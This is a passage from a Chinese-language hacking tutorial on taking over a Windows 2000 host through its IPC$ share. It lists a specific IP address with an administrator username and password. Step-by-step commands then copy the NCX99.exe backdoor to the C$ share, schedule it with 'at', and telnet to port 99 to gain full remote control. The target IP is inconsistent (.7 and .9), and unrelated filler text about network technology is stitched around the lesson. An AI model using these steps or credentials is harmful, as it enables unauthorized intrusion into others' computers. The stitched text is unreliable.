網絡技術是從1990年代中期發展起來的新技術，它把互聯網上分散的資源融為有機整體，實現資源的全面共享和有機協作，使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機、存儲資源、數據資源、信息資源、知識資源、專家資源、大型數據庫、網絡、傳感器等。 當前的互聯網只限于信息共享，網絡則被認為是互聯網發展的第三階段。

6.1 IPC$漏洞入侵(2)

    

6.1.2  基于IPC$中級入侵

6.1.1節我們了解了基于IPC$共享入侵的簡單入侵，本小節結合上一小節內容來深入來了解一下基于IPC$共享的中級入侵。

1. 入侵測試目標：

測試主機：61.150.115.7(Windows2000)

用戶名：System32(隸屬Administrators組)

口令：ffhh.net

2. 入侵測試所用程序：

●      Windows NT下的：command.com

●      Windows 2000下的：命令提示符(即:cmd.exe)

●      后門程序：NCX99.exe (用于遠程登錄到目標服務器的99號端口)

3. 入侵測試：

所用系統為：Windows 2000 Professional

例如，通過IPC$共享和遠程61.150.115.7建立了遠程連接(請參閱上一章節)，所得到的是可以控制其硬盤讀寫操作，但是一個入侵者不會就此停手，還會進一步地控制目標機，接下來看看入侵者是如何完全控制目標機的。

(1) 在命令提示符下輸入如下命令格式：

copy d:\hacker\ncx99.exe \\61.150.115.9\c$

命令解釋：

將本地D盤hacker文夾下的NCX99.exe程序復制到61.150.115.9的C盤下。

輸入完畢后按Enter鍵，等待幾秒鐘后將會顯示文件已復制，如圖6-14所示。

圖6-14  在命令提示符下向目標機復制文件

注：

這里也可以通過將目標機61.150.115.9中的C盤映射到本地盤，然后直接復制過去，如圖6-15所示。

圖6-15  通過映射將ncx.exe程序復制到目標機

通過圖6-16可以看到NCX.exe成功地添加到目標機的C盤下。

(2) 在命令提示符下輸入如下命令格式：

net time \\61.150.115.9

圖6-16  NCX99.exe成功地被復制到目標機的C盤下

命令解釋：

查看目標機61.150.115.9上的時間。

輸入完畢后按Enter鍵，將會顯示目標機現在的時間，如圖6-17所示。

圖6-17  查看目標機上的時間

注：

屏幕上現在顯示的時間是下午03:27，但是系統所采用的是24小時制，那么現在目標機上的時間就是15:27。

(3) 在命令提示符下輸入如下命令格式：

at \\61.150.115.9 15:29 c:\ncx99.exe

命令解釋：

讓61.150.115.9在15:29時執行ncx99.exe程序，也就將ncx99.exe添加到目標機的計劃任務中，讓它在15:29時自動運行。

輸入完畢后按Enter鍵，將出現新加了一項作業的字樣，如圖6-18所示。

圖6-18  添加計劃任務

注意：

通過net time \\61.150.115.9得知目標服務器上的時間是15:27，但在添加計劃任務時將時間設為15:29，這是因為本地到遠程傳輸時需一定的時間，為了確保NCX99.exe的運行，因此將計劃執行的時間向后推2分鐘。在這里也可以通過如下命令查看計劃是否被添加：

at \\61.150.115.9

命令解釋：

查看目標機計劃任務列表輸入完畢后，按Enter鍵即可看到如圖6-19所示，計劃被成功添加。

圖6-19  查看目標機計劃任務列表

(4) 過2分鐘后，在命令提示符下輸入如下命令格式：

telnet 61.150.115.9 99

則如圖6-20所示的畫面。

圖6-20  通過99號端口遠程登錄到目標機

命令解釋：

目標服務器執行NCX99.exe后，就會在本機開啟一個99號端口，用于遠程登錄。

命令輸入完畢后按下Enter鍵，即可遠程登錄到目標機，如圖6-21所示。

圖6-21  遠程登錄到目標機

此時已完全控制了目標機。

(5) 入侵檢測成功完成！

網絡的神奇作用吸引著越來越多的用戶加入其中，正因如此，網絡的承受能力也面臨著越來越嚴峻的考驗―從硬件上、軟件上、所用標準上......，各項技術都需要適時應勢，對應發展，這正是網絡迅速走向進步的催化劑。